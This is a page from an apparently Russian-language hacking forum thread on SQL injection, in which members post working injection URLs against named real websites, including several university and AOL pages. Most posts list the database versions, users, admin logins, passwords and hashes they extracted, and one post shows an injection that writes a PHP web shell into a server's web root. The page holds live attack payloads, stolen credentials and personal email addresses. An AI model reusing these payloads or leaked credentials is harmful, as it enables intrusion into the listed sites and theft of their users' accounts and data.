SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    5.0.22:alinalexie@localhost:efitness

    http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+concat_ws(0x3a,version(),user()),2,3,4,5,6/*
     
    #4121 JIyka, 20 Dec 2007
    Last edited: 20 Dec 2007
  2. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    login:pass / billie:eakin brian:c@nd1@ linfra:linfra

    http://worldcondos.com/viewdetails.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+registered/*​
     
    #4122 JIyka, 20 Dec 2007
    Last edited: 20 Dec 2007
  3. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    4.1.20:f7igqei2emj0@localhost

    http://www.e-dereham.info/viewdetails.php?section=public&id=-1+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14/*​
     
  4. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    4.1.11:dcautos@localhost:dcautos

    http://www.dc-autos.com/viewdetails.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*​
     
    1 person likes this.
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    phpbuddy.com

    phpbud22_phpbudd@localhost::phpbud22_phpbuddy::4.1.21-standard
     
    2 people like this.
  6. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.tooltime.nl/pagina.php?id=-2+union+select+1,2,concat(id,0x3a,name)+from+admin/*
     
    2 people like this.
  7. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    .еда
    classes.design.ucla.edu
    Code:
    http://classes.design.ucla.edu/Fall05/28/index_visor.php?id=3&ejercicio_id=15&persona_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8+--+
    5.0.22:[email protected]:F0528
    west.stanford.edu
    Code:
    http://west.stanford.edu/cgi-bin/pager.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5+--+
    5.0.45-3-log:[email protected]:g_west_west
     
    3 people like this.
  8. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    kniga-market.kiev.ua

    HTML:
    http://www.kniga-market.kiev.ua/producers.php?category=1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/*
    USER:u_knigamarke@localhost
    VERSION:4.1.22
    DATABASE:knigamarket
     
    2 people like this.
  9. ak-TEP

    ak-TEP Member

    Joined:
    17 Nov 2006
    Messages:
    13
    Likes Received:
    8
    Reputations:
    5
    ability.aol.com
    Code:
    http://ability.aol.com/ability/index.php?ID=45&catID=-6+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1)
    4.1.14-standard-log:[email protected]:aol_ability
     
    3 people like this.
  10. TEAM MUSLEMEN

    TEAM MUSLEMEN New Member

    Joined:
    22 Nov 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    HelO :D

    http://www.topfitness.ro

    USER
    SORS

    pass hash MYSQL
    255B543308FCC38F

    admin panel
    http://www.topfitness.ro/admin/

     
  11. TEAM MUSLEMEN

    TEAM MUSLEMEN New Member

    Joined:
    22 Nov 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    good :D

    from name (USER) ;)
     
  12. TEAM MUSLEMEN

    TEAM MUSLEMEN New Member

    Joined:
    22 Nov 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0

    Excellent work

    Continued


    use name
    Usama

    password hash
    dcddb75469b4b4875094e14561e573d8


    end password is
    Tigger You are excellent ;)
    :D :D :D :D :D
     
    1 person likes this.
  13. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    HTML:
    http://www.archaeolog.ru/index.php?id=2&id_nws=58+UNION+SELECT+1,2,3,4,concat(login,0x3a,pass,0x3a,email),6,7,8,9,10+FROM+userdata+LIMIT+1,1/*
    Там же columns:
    id, pid, fio, stepen, dolshnost, bio, login, pass, email, telephon :p
     
    #4133 ~EviL~, 20 Dec 2007
    Last edited: 21 Dec 2007
  14. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Боян! Причем ты уже не первый кто за сегодня инъект на труде выкладывает =\\
     
    1 person likes this.
  15. netpingx

    netpingx New Member

    Joined:
    13 Dec 2007
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    http://baltbay.com/index.php?bloks=2&sad=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

    http://backipars.lv/kipars/index.php?sadala=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

    http://jauniesivero.lv/index.php?page=news&section=-1/**/union/**/select/**/11111,22222/**from/**/user

    http://hostelturiba.lv/index.php?lang=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*
     
    2 people like this.
  16. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    www.unbureauenplus.fr
    Code:
    http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*
    5.0.44-log:[email protected]:unbureau_base1
    Code:
    http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,pseudo,passe),2,3+from+papa_admin/*
    логин:пасс
    omi:1905
     
    5 people like this.
  17. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    login:Usama
    hash пароля:dcddb75469b4b4875094e14561e573d8
    пароль:00000

    Можешь залить шелл через инжекцию и узнать где админка.
    ----------------------------------------------------------

    ankor.ru

    HTML:
    http://www.ankor.ru/cityDescr.php3?uid=60&cid=17+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
    USER:[email protected]
    VERSION:4.0.27-log
    DATABASE:ankor
     
    #4137 .Begemot., 21 Dec 2007
    Last edited: 21 Dec 2007
    2 people like this.
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.trizland.ru/task.php?id=-11+union+select+1,2,3,4,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),6,7,8,9/*

    4.1.18/bin17www/[email protected]

    -----------------------------------------------------------------------------

    all-news.ru


    http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/*

    5.0.45-log/u15215_2/[email protected]


    http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,username,password,contact_email,contact_icq),3,4,5,6,7+from+u15215.zp_partners/*

    логин/пароль/мейл/уин
    runet/261072/[email protected]/


    http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,login,password,email,authkey),3,4,5,6,7+from+u15215.users/*

    логин/пароль/мейл/код авторизации
    BaDGiRL/1791179/[email protected]/
     
    5 people like this.
  19. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    HTML:
    http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>'+,4,5from+user+into+outfile+'/home/site/html/shell.php'/*
    Такой запрос создаст шелл в директории "/home/site/html/"

    ----------------------------------------

    cavs.msstate.edu

    HTML:
    http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4/*
    USER:[email protected]
    VERSION:5.0.24a-standard
    DATABASE:webdata

    Таблицы -
    HTML:
    http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Table_name),4+from+information_schema.tables/*
    Колонны -
    HTML:
    http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Column_name),4+from+information_schema.columns/*
     
    3 people like this.
  20. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Код:

    http://www.odin-torg.com/catalog_item.php?id=-13+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1/*&cat=

    5 мускул,есть 3 бд с паролями админов,сайт сам фигня,но интересно другое а именно CMSка ;)

    p.s ни один пароль к админке не подходит,кто найдет акк с доступом тому от меня плюсики :)
     
    1 person likes this.
Thread Status:
Not open for further replies.